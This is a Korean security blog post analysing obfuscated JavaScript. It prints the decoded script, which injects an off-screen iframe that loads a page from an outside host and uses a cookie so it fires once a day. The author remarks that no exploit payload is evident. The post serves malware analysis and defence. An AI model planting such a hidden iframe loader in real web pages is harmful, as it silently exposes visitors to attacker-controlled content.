js 난독화

Notice

Recent Posts

Link

삽질인생

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

Tags more

Archives

Today

Total

관리 메뉴

annyoung

js 난독화 본문

분석생활

js 난독화

nopsled 2015. 10. 22. 22:04

This Page Unable을 출력해준다. 누가 보면 정말 페이지 사용 못하는 줄 알겠다.

function gxr09() {

var static='ajax';

var controller='index.php';

var gxr = document.createElement('iframe');

gxr.src = 'http://flintys.nl/count.php';

gxr.style.position = 'absolute';

gxr.style.color = '84119';

gxr.style.height = '84119px';

gxr.style.width = '84119px';

gxr.style.left = '100084119';

gxr.style.top = '100084119';

if (!document.getElementById('gxr')) {

document.write('<p id=\'gxr\' class=\'gxr09\' ></p>');

document.getElementById('gxr').appendChild(gxr);

}

function SetCookie(cookieName,cookieValue,nDays,path) {

var today = new Date();

var expire = new Date();

if (nDays==null || nDays==0) nDays=1;

expire.setTime(today.getTime() + 3600000*24*nDays);

document.cookie = cookieName+"="+escape(cookieValue)

+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

var start = document.cookie.indexOf( name + "=" );

var len = start + name.length + 1;

if ( ( !start ) &&

( name != document.cookie.substring( 0, name.length ) ) )

{

return null;

}

if ( start == -1 ) return null;

var end = document.cookie.indexOf( ";", len );

if ( end == -1 ) end = document.cookie.length;

return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

gxr09();

}

복호화하면 위와 같은 스크립트가 나오는데, iframe안에 src속성 값을 주어 로드시킨다.

exploit의 요지는 없어보인다.

저작자표시 비영리

'분석생활' 카테고리의 다른 글

vbscript parite 악성코드 (5)	2015.10.24
온라인 게임 계정 탈취 악성코드 (3)	2015.10.23
라인 몸캠피싱 해커 프로파일링 (0)	2015.07.28
미국형 선입금 사기 (0)	2015.06.09
I am waiting for your reply (0)	2015.06.08

'분석생활' Related Articles

Comments

annyoung

js 난독화 본문

js 난독화

'분석생활' 카테고리의 다른 글

티스토리툴바